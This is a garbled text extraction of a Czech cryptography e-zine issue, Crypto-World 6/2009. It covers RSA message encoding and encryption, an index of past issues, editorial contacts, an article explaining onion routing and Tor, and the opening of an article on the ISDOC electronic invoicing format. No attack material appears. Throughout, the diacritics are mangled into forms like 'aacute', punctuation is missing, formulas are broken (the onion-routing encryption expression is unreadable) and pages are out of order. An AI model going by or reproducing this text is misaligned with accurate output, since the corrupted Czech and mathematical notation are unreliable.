Zpraacutevu M překoacutedujeme nejprve do čiacuteselneacuteho tvaru K tomu použijeme některou vhodnou převodovou tabulku Např tuto tabulku

0 1 2 3 4 5 6 7 8 9 6 0 Mezera 2 3 4 A B C D E 7 F G H I J K L M N O 8 P Q R S T U V W X Y 9 Z 1 2 3 4 5 6 7 8 9 Zpraacutevu M pak zformaacutetujeme do posloupnosti čiacutesel pevneacute deacutelky (deacutelka bude rovna deacutelce modulu N) K tomu použijeme vlastniacute formaacutetovaacuteniacute kteraacute pracovně nazveme CW10 Formaacutetovaacuteniacute CW10 1) Maacute-li modul deacutelku k budeme zpraacutevu převedenou podle tabulky dělit na skupiny deacutelky k-1 2) Všechny skupiny musiacute miacutet deacutelku k-1 nemaacute-li proto posledniacute skupina tuto deacutelku doplniacuteme

ji zprava přiacuteslušnyacutem počtem nul 3) Všechny ziacuteskaneacute skupiny nyniacute doplniacuteme zleva jednou nulou Deacutelka každeacute skupiny je po

těchto uacutepravaacutech rovna k 4) Vyacutesledek po šifrovaacuteniacute maacute deacutelku rovnou maximaacutelně k nemaacute-li ji doplniacuteme vyacutesledek zleva

nulami Ziacuteskanyacute vyacutesledek po formaacutetovaacuteniacute M označme M= m1 m2 m3 hellip 4 Zašifrovaacuteniacute zpraacutevy M

Zašifrovaacuteniacutem zpraacutevy M pomociacute veřejneacuteho kliacuteče (Ne) rozumiacuteme řetězec

P = C1 C2 C3 kde

C1 equiv m1e mod N C2 equiv m2

e mod N C3 equiv m3e mod N Ci equiv mi

e mod N

5 Dešifrovaacuteniacute zpraacutevy P

Dešifrovaacuteniacute zpraacutevy P se pak provede tak že použijeme soukromyacute exponent d a tiacutem ziacuteskaacuteme původniacute zpraacutevu M

m1 equiv C1d mod N m2 equiv C2

d mod N m3 equiv C3d mod N mi equiv Cid mod N

6 Bezpečnost Pokud dokaacuteže přiacutejemce udržet svůj soukromyacute kliacuteč v tajnosti (a čiacutesla p a q byla dostatečně velkaacute) pak je ze znalosti šifroveacute zpraacutevy a veřejneacuteho kliacuteče vyacutepočetně složiteacute ziacuteskat otevřenou zpraacutevu

Crypto-World 62009

21

E O čem jsme psali v červnu 2000 ndash 2008 Crypto-World 62000 A Novaacute evropskaacute iniciativa v oblasti kryptografie (JPinkava) 2 B Fermatův test primality Carmichaelova čiacutesla bezčtvercovaacute čiacutesla (PVondruška)3 -5 C Červ LOVE-LETTER-FOR-YOUTXTVBS (PVondruška) 6-8 D EUROCRYPT 2000 (PVondruška) 9-11 E Code Talkers (IIIdiacutel) (PVondruška) 12-14 F Letem šifrovyacutem světem 15 G Zaacutevěrečneacute informace 16 Přiacuteloha Navajo Code Talkers revize z 1561945 soubor Dictionaryhtm

Crypto-World 62001 A Zaacutehadnaacute paacuteska z Prahy IIdiacutel (PVondruška JJanečko) 2- 6 B Radioaktivniacute rozpad a kryptografickeacute kliacuteče (LSmoliacutek) 7-9 C Kryptografie a normy diacutel 8 - Normy IETF - SMIME (J Pinkava) 10-13 D Počiacutetačovyacute kurs Lidovyacutech novin (PVondruška) 14-15 E Security and Protection of Information (D Cvrček) 16 F Praacutevniacute odpovědnost poskytovatelů (JMatejka) 17-23 G Ukončeniacute platnosti zneplatněniacute (a zrušeniacute) certifikaacutetu IIdiacutel (JProkeš) 24-25 H Letem šifrovyacutem světem 26-27 I Zaacutevěrečneacute informace 28 Přiacuteloha priloha6zip (fotografie Security 2001 teacutemata přednaacutešek na konferenci Eurocryptacute2001)

Crypto-World 62002 A Historie a statistika Crypto-Worldu (PVondruška) 2-4 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 4 (JPinkava) 5-8 C Bezpečnost informačniacuteho systeacutemu pro certifikačniacute služby (ISCS)

a objektovaacute bezpečnost (PVondruška) 9-16 D Informace - Cryptology ePrint Archive (VKliacutema) 17 E Letem šifrovyacutem světem 18-19

1 Kritika člaacutenku Je 1024-bitovaacute deacutelka kliacuteče RSA dostatečnaacute (Crypto-World 52002)

2 Zaacutekon o elektronickeacutem podpisu novelizovaacuten - Zaacutekon č 2262002 Sb 3 Hackeři pomozte 4 O čem jsme psali v červnu 2000 a 2001

F Zaacutevěrečneacute informace 20

Crypto-World 62003 A Nebezpečiacute internetovyacutech řešeniacute (MKuchař) 2-6 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 13

Atributoveacute certifikaacutety ndash diacutel 2 (JPinkava) 7-10 C Kryptografickeacute protokoly s nulovyacutem předaacuteniacutem znalostiacute(JPinkava) 11-12 D Elektronickeacute peniacuteze (PVondruška) 13-20 E Letem šifrovyacutem světem 21-23 F Zaacutevěrečneacute informace 24

Crypto-World 62009

22

Crypto-World 62004 A Měsiacutec prvočiacutesel (PVondruška) 2-5 B Statistickyacute rozbor největšiacuteho prvočiacutesla (PTesař) 6-7 C Program STORK - vstupniacute dokumenty přiacuteprava (E-CRYPT) čaacutest 2 (JPinkava) 8-16 D Letem šifrovyacutem světem 17-18 E Zaacutevěrečneacute informace 19

Crypto-World 62005 A Informace pro čtenaacuteře a autory (PVondruška) 2-3 B Kontrola certifikačniacute cesty čaacutest 1 (P Rybaacuter) 4-11 C O neziacuteskateľnosti rodneacuteho čiacutesla z jeho hashu (M Pivoluska) 12-13 D Přehledovaacute zpraacuteva o vyacuteznamnyacutech publikaciacutech a projektech na teacutema

poskytovaacuteniacute anonymity klasifikace a měřitelnost informačniacuteho soukromiacute (privacy) čaacutest 2 (M Kumpošt) 14-17

E Kryptografickeacute eskalačniacute protokoly čaacutest 1 (J Krhovjaacutek) 18-21 F Recenze knihy Jon Erickson Hacking - uměniacute exploitace 22 G O čem jsme psali v červnu 2000-2004 23 H Zaacutevěrečneacute informace 24

Crypto-World 62006 A PKI roaming (L Dostaacutelek) 2-4 B Vyhlaacuteška o podrobnostech atestačniacuteho řiacutezeniacute pro elektronickeacute naacutestroje

a lehkyacute uacutevod do časoveacute synchronizace (P Vondruška) 5-9 C Univerzaacutelniacute posilovače hašovaciacutech funkciacute včetně MD5 a SHA1

aneb zaacutechranneacute kolo pro zoufalce (V Kliacutema) 10-14 D NIST (National Institute of Standards and Technology - USA) a kryptografie Recommendation on Key Management ndash čaacutest 2

(J Pinkava) 15-18 E O čem jsme psali v červnu 1999-2005 19-20 F Zaacutevěrečneacute informace 21

Crypto-World 62007 A Přehled a historie polyalfabetickyacutech šifer (PVondruška) 2-11 B Matematizace komplexniacute bezpečnosti v ČR čaacutest I (JHrubyacute) 12-20 C Mikulaacutešskaacute kryptobesiacutedka Call for Papers 21 D O čem jsme psali v červnu 2000-2006 22-23 E Zaacutevěrečneacute informace 24 Přiacuteloha Mikulaacutešskaacute kryptobesiacutedka (6-7122007)- MKB2007_CallForPapers_cervenpdf

Crypto-World 62008 A RFID Co to vlastně maacuteme v kapse (MHlavaacuteč TRosa) 2 - 17 B Bezpečnost PHP aplikaciacute (JVraacutena) 18 - 22 C Popis šifrovaciacuteho algoritmu Serpent (JJeřaacutebek) 24 - 29 D O čem jsme psali v červnu 2000-2007 30 ndash 31 E Zaacutevěrečneacute informace 32

Crypto-World 62009

23

F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz

Page 7: Sešit 6/2009 (452 kB)

Crypto-World 62009

7

B Anonymita v globaacutelniacute siacuteti Ing Jan Hajnyacute Uacutestav telekomunikaciacute FEKT VUT Brno (hajnyfeecvutbrcz) Abstrakt ndash Hlavniacutem ciacutelem tohoto člaacutenku je popsat současnyacute stav tyacutekajiacuteciacute se ochrany privaacutetniacutech dat při použiacutevaacuteniacute informačniacutech systeacutemů a identifikovat zaacutekladniacute prostředky pro jejich ochranu V prvniacute čaacutesti jsou zmiacuteněny hlavniacute probleacutemy při využiacutevaacuteniacute současnyacutech informačniacutech technologiiacute a hrozby ktereacute naacutem mohou přineacutest Druhaacute čaacutest člaacutenku se věnuje jednomu z prvniacutech kroků při ochraně anonymity v počiacutetačovyacutech siacutetiacutech Jednaacute se o technologii Tor poskytujiacuteciacute možnost skrytiacute identity Osobniacute data a jejich využiacutevaacuteniacute

V současneacute době již plně žijeme v informačniacute společnosti tedy společnosti založeneacute na datech a jejich přenosu zpracovaacuteniacute Teacuteměř každyacute z naacutes využiacutevaacute osobniacute počiacutetač mobilniacute telefon kreditniacute karty či smart karty pro identifikaci v různyacutech organizaciacutech a uacuteřadech Neniacute však zcela zřejmeacute jakaacute data se ve skutečnosti pomociacute těchto přiacutestrojů přenaacutešiacute a kolik mohou řiacuteci o našem chovaacuteniacute a soukromiacute Nejsou to takeacute pouze zařiacutezeniacute kteraacute vlastniacuteme a kteraacute tak můžeme přiacutemo ovlivnit Jednaacute se i o tzv bezpečnostniacute zařiacutezeniacute všude kde se pohybujeme ndash např dohledoveacute kamery ve městech skenery na letišti biometrickeacute pasy nebo různeacute slevoveacute karty obchodniacutech řetězců Všechny tyto zařiacutezeniacute mohou pracovat s našiacute identitou a my nejsme schopni přiacuteliš ovlivnit kolik informaciacute o naacutes uvolňujiacute Mnoho přiacutekladů může byacutet uvedeno např ze člaacutenků Bruce Schneiera kteryacute se problematikou ochrany identity zabyacutevaacute Ze člaacutenku zabyacutevajiacuteciacuteho se problematikou privaacutetniacutech dat [1] je jasneacute že se nejednaacute pouze o teoretickou hrozbu Přiacutekladem mohou byacutet dohledoveacute systeacutemy Jen v Londyacuteně je v současneacute době okolo 500000 dohledovyacutech kamer [2] I přesto z některyacutech vyacutezkumů vyplyacutevaacute [3] že jejich efektivita neniacute při odhalovaacuteniacute zločinů přiacuteliš vysokaacute Zatiacutemco mohou miacutet menšiacute vliv na přesunutiacute zločinnosti na jinaacute miacutesta v globaacutelnějšiacutem měřiacutetku se neprojeviacute Na druhou stranu jsou tyto systeacutemy v provozu 24 hodin denně a sniacutemajiacute všechny osoby na veřejnyacutech miacutestech S technologickyacutem vyacutevojem nejsme daleko od automatickeacuteho rozpoznaacutevaacuteniacute tvaacuteřiacute a tedy i identifikace osob na zaacuteznamech Budou o naacutes tedy znaacutema data tyacutekajiacuteciacute se našeho pohybu během dne chovaacuteniacute (např kde nakupujeme) a dokonce bude možneacute kamery zneužiacutet k ilegaacutelniacutemu sledovaacuteniacute osob v soukromyacutech bytech atd ktereacute jsou v dosahu kamer Stejně tak znaacuteme leteckeacute fotografie sloužiacuteciacute jako podklady k mapaacutem ndash dostatečně detailniacute na odhaleniacute mnoha informaciacute o soukromyacutech osobaacutech

Dalšiacutem přiacutekladem ohroženiacute identity jsou smart karty a jejich využiacutevaacuteniacute během běžneacute denniacute činnosti Neniacute složiteacute si uvědomit že někde musiacute existovat data o tom co během dne jiacuteme (zaměstnaneckeacute ID karty) nakupujeme v obchodech (kreditniacute karty) jakeacute maacuteme zvyky při naacutekupech např potravin (slevoveacutečlenskeacute karty) nebo o co se zajiacutemaacuteme (videopůjčovnyknihovny) Ve všech těchto přiacutepadech je jednoznačně spojena naše identita s našiacutem chovaacuteniacutem Vytvaacuteřiacute se tak jakyacutesi datovyacute otisk našiacute osobnosti i přesto že tyto data jsou rozprostřena u různyacutech organizaciacute a na různyacutech miacutestech

V některyacutech přiacutepadech dokonce můžeme uacutespěšně tvrdit že data o naacutes velice uacutezce ovlivňujiacute naše životy [4] Na zaacutekladě těchto informaciacute mohou instituce rozhodovat o tom zda dostaneme půjčku v bance zda dostaneme viacutezum do zahraničiacute či zda jsme dostatečně důvěryhodniacute pro sděleniacute tajnyacutech informaciacute Nepřiacutejemnyacutem faktem je že sděleniacute těchto dat si nijak neuvědomujeme a nemůžeme je tiacutem nijak ovlivnit stejně tak jako nemůžeme ovlivnit chyby ktereacute se můžou v těchto datech vyskytnout Jednoduše proto že ani neviacuteme kde jsou v současneacute době data uložena Jelikož se jednaacute o cenneacute informace jsou často prostředkem

Crypto-World 62009

8

obchodu např reklamniacutech agentur To je zřetelneacute při využiacutevaacuteniacute služeb jako je veřejnyacute email internetoveacute obchody vyhledaacutevaciacute naacutestroje či komunikačniacute naacutestroje (Facebook atd) kde je reklama zcela ciacutelenaacute podle toho jak danou službu využiacutevaacuteme Tato reklama je pak takeacute mnohem uacutečinnějšiacute tiacutem paacutedem jsou jejiacute zadavateleacute ochotni platit značneacute sumy za data o uživateliacutech

Jak bylo uvedeno u přiacutekladů z předchoziacuteho textu existuje při použiacutevaacuteniacute informačniacutech technologiiacute přiacuteliš hrozeb na to aby zůstala naše identita skryta Tato digitaacutelniacute identita je pak využiacutevaacutena při aktivitaacutech ktereacute již nemusiacute byacutet zcela v zaacutejmu uživatele Probleacutem je že v teacuteto faacutezi je teacuteměř nemožneacute takoveacuteto užiacutevaacuteniacute dat omezit či kontrolovat Důvodem neniacute až tak technologickaacute nemožnost jako neochota poskytovatelů těchto služeb umožňovat anonymnějšiacute prostřediacute V naacutesledujiacuteciacutem textu bude představen naacutestroj kteryacute může řešit prvotniacute probleacutem tyacutekajiacuteciacute se analyacutezy provozu v datovyacutech siacutetiacutech Je zde uveden jelikož se jednaacute o stavebniacute prvek využitelnyacute při uvedeniacute dalšiacutech technik ochrany anonymity uživatele v celosvětoveacute siacuteti a o prvek bez ktereacuteho by pokročilejšiacute techniky ztraacutecely smysl Adresace v IP siacutetiacutech

Prvniacute probleacutem kteryacute potřebujeme vyřešit v souvislosti se zvyacutešeniacutem anonymity v IP siacutetiacutech je adresace a směrovaacuteniacute Všechna posiacutelanaacute data jsou zapouzdřena do IP paketů viz Obr č 1

Obr č 1 Hlavička IP paketu Součaacutestiacute hlavičky těchto paketů je takeacute zdrojovaacute adresa a ciacutelovaacute adresa tedy jednoznačneacute identifikaacutetory původce komunikace a ciacutele komunikace V předchoziacute kapitole však byly popsaacuteny hrozby plynouciacute z možnosti identifikace komunikace Vidiacuteme že tedy již v naacutevrhu komunikačniacuteho protokolu TCPIP je jistyacute probleacutem braacuteniacuteciacute zvyacutešeniacute anonymity v globaacutelniacute siacuteti Existujiacute však řešeniacute kteraacute jsou již v současneacute době použiacutevaacutena a kteraacute mohou tento probleacutem uacutespěšně vyřešit Ziacuteskaacuteme tak protokol pro anonymniacute komunikaci kde z odchycenyacutech dat nepůjdou zjistit jejiacute uacutečastniacuteci Jedniacutem z těchto řešeniacute je onion routing [6] Onion routing

Ciacutelem metody je anonymniacute provoz v IP siacutetiacutech diacuteky tzv onion routerům Technika využiacutevaacute současnou infrastrukturu je tedy ihned použitelnaacute po nainstalovaacuteniacute přiacuteslušneacuteho software Zaacutekladniacutemi prvky jsou klient (Alice) onion routery a server (Bob) ke ktereacutemu Alice požadavek vysiacutelaacute Z odchycenyacutech dat neniacute možneacute vysledovat ani obsah komunikace ani jejiacute uacutečastniacuteky Každyacute prvek kteryacute se komunikace uacutečastniacute (onion router) znaacute pouze předchoziacute

Crypto-World 62009

9

prvek a naacutesledujiacuteciacute v cestě žaacutednyacute jinyacute Pouze posledniacute onion router v řetězci tzv gateway data rozšifruje vyšle požadavek na server Boba v internetu a obdržiacute odpověď Tato odpověď se zase zašifruje a vraciacute se přes onion routery zpět k původci komunikace Situace je znaacutezorněna pomociacute Obr č 2

Obr č 2 Struktura onion routing

Bezpečnost tohoto řešeniacute a anonymita Alice je založena praacutevě na routerech Ty si předaacutevajiacute data mezi sebou a znajiacute praacutevě jen předchůdce a naacutesledovniacuteka Jelikož je cesta přes routery vždy naacutehodně zvolenaacute a unikaacutetniacute neniacute možneacute zjistit Alici Jedinyacute kdo s niacute přiacutemo komunikuje je prvniacute router nicmeacuteně Alice se chovaacute z jeho pohledu jako běžnyacute router kteryacute provoz takeacute jen přeposiacutelaacute a negeneruje tudiacutež ani prvniacute router neznaacute původce dat Celyacute provoz vyslaacuteniacute požadavku od Alice k Bobovi tedy probiacutehaacute naacutesledovně

1 Všechny prvky v siacuteti vlastniacute soukromyacute a veřejnyacute kliacuteč asymetrickeacute kryptografie 2 V prvniacutem kroku si klient zvoliacute routery přes ktereacute půjde provoz Na jejich počtu zaacutevisiacute

bezpečnost a anonymita ndash čiacutem viacutece tiacutem je menšiacute možnost vysledovaacuteniacute Tato cesta musiacute byacutet naacutehodnaacute Klient znaacute veřejneacute kliacuteče těchto routerů

3 Klient zašifruje svůj požadavek dle naacutesledujiacuteciacuteho postupu )))((( požadavekEhlavEhlavEData

CBA VKVKVK ++=

4 Tedy vezme data pro Boba a zašifruje je pomociacute veřejneacuteho kliacuteče posledniacuteho routeru C (gateway) K vyacutesledku pak připojiacute IP hlavičku s adresou routeru C a znovu zašifruje pomociacute VK předchoziacuteho routeru B Tento proces se opakuje až k prvniacutemu routeru A

5 Tyto data pak odešle routeru A a tvaacuteřiacute se jako běžnyacute router tj že data pouze přeposiacutelaacute Router pomociacute sveacuteho soukromeacuteho kliacuteče rozšifruje kryptogram a zjistiacute hlavičku IP paketu v němž je uložena IP dalšiacuteho routeru a kryptogram zašifrovanyacute veřejnyacutem kliacutečem tohoto routeru Odešle tedy tyto data routeru B Takto postupujeme až k posledniacutemu routeru Jak je vidět žaacutednyacute router se nedozviacute viacutece než IP dalšiacuteho routeru (popř předchoziacuteho kteryacute data zaslal) a zašifrovanaacute data

6 Jakmile doraziacute data k posledniacutemu routeru C mohou byacutet rozšifrovaacutena a ziacuteskaacute se tak požadavek Ten je routerem vyslaacuten do internetu a je ziacuteskaacutena odpověď Odpověď je poslaacutena zpět stejnyacutem kanaacutelem Metoda daacutele přidaacutevaacute dalšiacute bezpečnostniacute techniky napřiacuteklad routery vklaacutedajiacuteciacute naacutehodneacute zpožděniacute do komunikace (aby nebylo možneacute sledovat tok dat dle časovaacuteniacute) či vklaacutedajiacuteciacute nesmyslnaacute data

TOR Vyacuteše zmiacuteněnyacute postup je zaacutekladem onion routingu tedy vytvaacuteřiacute se vrstvy do nichž

jsou vždy šifrovaacuteny informace o dalšiacutem bodě Nejznaacutemějšiacute implementaciacute tohoto postupu je TOR což je projekt The Onion Routing [7] Zde je postup jemně odlišnyacute Vytvořiacute se

Crypto-World 62009

10

symetrickeacute kliacuteče pro každyacute autentizovanyacute router pomociacute Diffie-Hellmanova algoritmu [8] a PKI [9] ktereacute se daacutele využiacutevajiacute k šifrovaacuteniacute zpraacutev (z důvodu rychlosti) Alice pak zpraacutevu zašifruje postupně všemi symetrickyacutemi kliacuteči ve stejneacutem duchu jako v předchoziacutem přiacutepadě viz Obr č 3

Obr č 3 Dopřednyacute směr v TOR

Zpraacuteva je pak doručena bezpečně až Bobovi Ten může vytvořit odpověď a poslat ji zpětnou cestou kde každyacute router zpraacutevu zašifruje svyacutem symetrickyacutem kliacutečem přidaacute tedy dalšiacute vrstvu Až doraziacute zpraacuteva k Alici může byacutet rozšifrovaacutena jelikož Alice všechny symetrickeacute kliacuteče znaacute Situace je znaacutezorněna na Obr č 4

Obr č 4 Odpověď v TOR

Obr č 5 TOR ndash přenos zpraacutev

Crypto-World 62009

11

Vyacutesledkem je praktickaacute implementace kteraacute naacutem dovoliacute komunikovat v IP siacutetiacutech zcela

anonymně i přes nutnost použiacutevaacuteniacute IP adres Zjednodušenyacute proces vytvořeniacute kanaacutelu je takeacute na Obr č 5 Zaacutevěr

Hlavniacutem ciacutelem tohoto člaacutenku bylo uvedeniacute důvodů pro zvyacutešeniacute anonymity v prostřediacute globaacutelniacute siacutetě a uvedeniacute řešeniacute ktereacute může sloužit jako počaacutetečniacute bod Byl zde stručně popsaacuten princip tzv onion routingu a nejpoužiacutevanějšiacute implementace TOR Na zaacutekladě těchto naacutestrojů je již možneacute zajistit anonymniacute komunikaci mezi dvěma prvky využiacutevajiacuteciacute IP siacutetě přičemž data budou mezi prvky vyměněna ale pro všechny uacutečastniacuteky zůstane identita klienta skryta Tyto naacutestroje bude daacutele možneacute využiacutet v dalšiacutech metodaacutech vyššiacute vrstvy napřiacuteklad u protokolů majiacuteciacutech zajistit anonymniacute autentizaci Literatura

[1] SCHNEIER Bruce The Tech Lab Bruce Schneier [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpnewsbbccouk1hitechnology7897892stmgt

[2] FactCheck how many CCTV cameras [online] 2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwchannel4comnewsarticlessocietyfactcheck+how+many+cctv+cameras2291167gt

[3] SCHNEIER Bruce CCTV doesnt keep us safe yet the cameras are everywhere [online]

2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwguardiancouktechnology2008jun26politicsukcrimegt

[4] SCHNEIER Bruce Our Data Ourselves [online] 2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwwiredcomprintpoliticssecuritycommentarysecuritymatters200805securitymatters_0515gt

[5] Onion routing [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpenwikipediaorgwikiOnion_routinggt

[6] Tor anonymity online [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwtorprojectorggt

[7] DIFFIE Whitfield HELLMAN Martin New Directions in Cryptography [online] 1976 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwcsrutgersedu~tdnguyenclassescs671presentationsArvind-NEWDIRSpdfgt

[8] PKI [online] - [cit 2009-04-26] Dostupnyacute z WWW lthttpcswikipediaorgwikiPKIgt

Crypto-World 62009

12

C Formaacutet elektronickeacute fakturace ISDOC Petr Kuchař ABRA Software as (petrkucharabraeu ) sdruženiacute SPIS (petrkucharspiscz) Preambule S narůstajiacuteciacutem použiacutevaacuteniacutem ICT technologiiacute ve všech oborech lidskeacute činnosti je v posledniacutem obdobiacute pozorovatelnyacute trend většiacuteho použiacutevaacuteniacute elektronickyacutech dokumentů a jejich vyacuteměny mezi subjekty ve smyslu nahrazeniacute klasickyacutech papiacuterovyacutech postupů elektronickyacutemi V tomto duchu jde i legislativa v ČR kteraacute od roku 2000 znaacute elektronickyacute podpis od roku 2005 majiacute elektronickeacute daňoveacute doklady stejnou vaacutehu jako papiacuteroveacute a od 72009 bude možneacute autorizovaně konvertovat papiacuteroveacute dokumenty na elektronickeacute a naopak a takeacute komunikovat se staacutetem či dalšiacutemi subjekty elektronicky prostřednictviacutem tzv Datoveacute schraacutenky Vrcholem trendu elektronizace ve veřejneacute spraacutevě je pak systeacutem zaacutekladniacutech registrů schvaacutelenyacute Poslaneckou sněmovnou 1322009 kteryacute posune eGovernment v Českeacute republice po mnoha letech na zcela novou informatickou uacuteroveň Vedle přiacutekladů z veřejneacute spraacutevy je stejnyacute trend pozorovatelnyacute i ve sfeacuteře korporaacutetniacute Jedniacutem z milniacuteků je vybudovaacuteniacute formaacutetu elektronickeacute fakturace s naacutezvem ISDOC Tento formaacutet byl vystavěn Pracovniacute skupinou pro elektronickou fakturaci sdruženiacute SPIS a maacute šanci staacutet se de facto standardem elektronickeacute fakturace v ČR V řiacutejnu 2008 se 14 vyacuteznamnyacutech firem z oboru ICT rozhodlo k podpisu bdquoDeklarace o společneacutem postupu v oblasti elektronickeacute fakturaceldquo kterou se tyto subjekty zavaacutezaly formaacutet implementovat do svyacutech fakturačniacutech produktů v obdobiacute jednoho roku od jeho vyhlaacutešeniacute ke ktereacutemu došlo 1932009 Naacutesledujiacuteciacute přiacutespěvek se věnuje vysvětleniacute důvodů jeho existence technologickyacutech vyacutechodisek použityacutech při jeho naacutevrhu včetně řešeniacute problematiky elektronickeacuteho podpisu a takeacute jednomu z naacutestrojů pro jeho hromadneacute nasazeniacute

Co je formaacutet ISDOC Formaacutet ISDOC je formaacutet elektronickeacute fakturace definovanyacute jako XML soubor a popsanyacute XSD scheacutematem Součaacutestiacute formaacutetu je i zaručenyacute elektronickyacute podpis založenyacute na kvalifikovaneacutem certifikaacutetu čiacutemž se takovyacute dokument staacutevaacute daňovyacutem dokladem vystavenyacutem v elektronickeacute formě podle sect 26 odst4 zaacutekona č2352004 o dani z přidaneacute hodnoty

Hlavniacute myšlenkou formaacutetu ISDOC je umožnit korporaacutetniacutemu i veřejneacutemu sektoru posiacutelaacuteniacute datovyacutech zpraacutev jejichž interniacute formaacutet bude v souladu s našiacute legislativou bude podporovaacuten vyacuteznamnyacutemi vyacuterobci fakturačniacuteho software v ČR a hlavně bude jednotnyacute Změniacute tak leacuteta trvajiacuteciacute žalostnyacute stav informačniacute praxe v našiacute zemi kdy ač technologie i legislativa elektronickou fakturaci dovolovala se tato diacuteky existenci mnoha proprietaacuterniacutech formaacutetů různyacutech vyacuterobců nedala použiacutet v globaacutelniacutem měřiacutetku Tak v roce 2006 vznikla z iniciativy ABRA Software as ve sdruženiacute SPIS pracovniacute skupina kteraacute navaacutezala na legislativniacute rešerše svyacutech předchůdců z roku 2003 a začala hledat konkreacutetniacute legislativniacute i technologickou cestu Zaklaacutedajiacuteciacute členoveacute skupiny ABRA Software LCS International a Ernst amp Young se zaacutehy rozrostli o dalšiacute firmy jako jsou Ciacutegler Software K2Atmitec Stormware DC Concept JKR nebo Českaacute spořitelna Pozornyacute čtenaacuteř již jistě postřehl že jde většinou o konkurenty na trhu informačniacutech a ERP systeacutemů Ano je tomu tak nicmeacuteně myšlenka jednotneacuteho formaacutetu je natolik silnaacute že i firmy v přiacutemeacutem konkurenčniacutem postaveniacute jsou schopny si sednout k jednomu stolu a spolupracovat na společneacutem diacutele Kliacutečovou uacutelohu v tomto ohledu sehraacutelo Sdruženiacute pro informačniacute společnost (SPIS)

Crypto-World 62009

13

Proč ISDOC vznikl a jakyacute je jeho ciacutel Bliacutezkyacutem ciacutelem vzniku formaacutetu bylo sjednotit elektronickou podobu několika ekonomickyacutech dokumentů fakturačniacute povahy (faktura dobropis vrubopis zaacutelohovaacute faktura daňovyacute zaacutelohovyacute list a jeho dobropis) a daacutet jiacute prostřednictviacutem spolupraacutece a podpory vyacuteznamnyacutech vyacuterobců na trhu k dispozici jejich klientům - firmaacutem ktereacute se zabyacutevajiacute obchodem či službami a ktereacute z nejrůznějšiacutech důvodů neimplementovaly žaacutedneacute jineacute obecneacute řešeniacute Vzdaacutelenyacutem ciacutelem pak je dosaacutehnout tiacutemto způsobem zvyacutešeniacute produktivity praacutece v segmentu vyacuteroby a distribuce zbožiacute i v segmentu služeb což v dlouhodobeacutem horizontu pomůže Českeacute republice jako celku se prosadit v evropskeacutem kontextu jako země s velkyacutem podiacutelem služeb s vysokou přidanou hodnotou Tiacutem aktivita ISDOC plniacute i jedno ze zaacutekladniacutech poslaacuteniacute sdruženiacute SPIS

Hlavniacute vyacutehody ISDOC Nevyžaduje pro komunikaci žaacutedneacuteho zprostředkovatele

Jedna z hlavniacutech vyacutehod tohoto formaacutetu XML soubor obsahuje elektronickyacute podpis a je tudiacutež plnohodnotnyacutem daňovyacutem dokladem V tomto smyslu neniacute podstatneacute jakaacute přenosovaacute infrastruktura je použita a jak došlo k doručeniacute dokladu od vystavitele k přiacutejemci Je možneacute tyto soubory posiacutelat jako přiacutelohu v běžneacutem e-mailu je možneacute použiacutevat zabezpečenyacute přenos pomociacute VPN či dalšiacutech řešeniacute (jako např bdquoNESS Trade Connectorldquo což je zabezpečenyacute přenos na uacuterovni B2B) nebo je možneacute soubory dopravovat na fyzickyacutech meacutediiacutech typu Flash či dokonce FD Důsledkem teacuteto vyacutehody je samozřejmě uacutespora transakčniacutech naacutekladů ktereacute např malyacutem firmaacutem doposud braacutenily takoveacute řešeniacute nasadit Tato vlastnost byla jedniacutem ze zaacutekladniacutech požadavků celeacuteho zadaacuteniacute formaacutetu ISDOC

Připouštiacute možnost zprostředkovatele komunikace

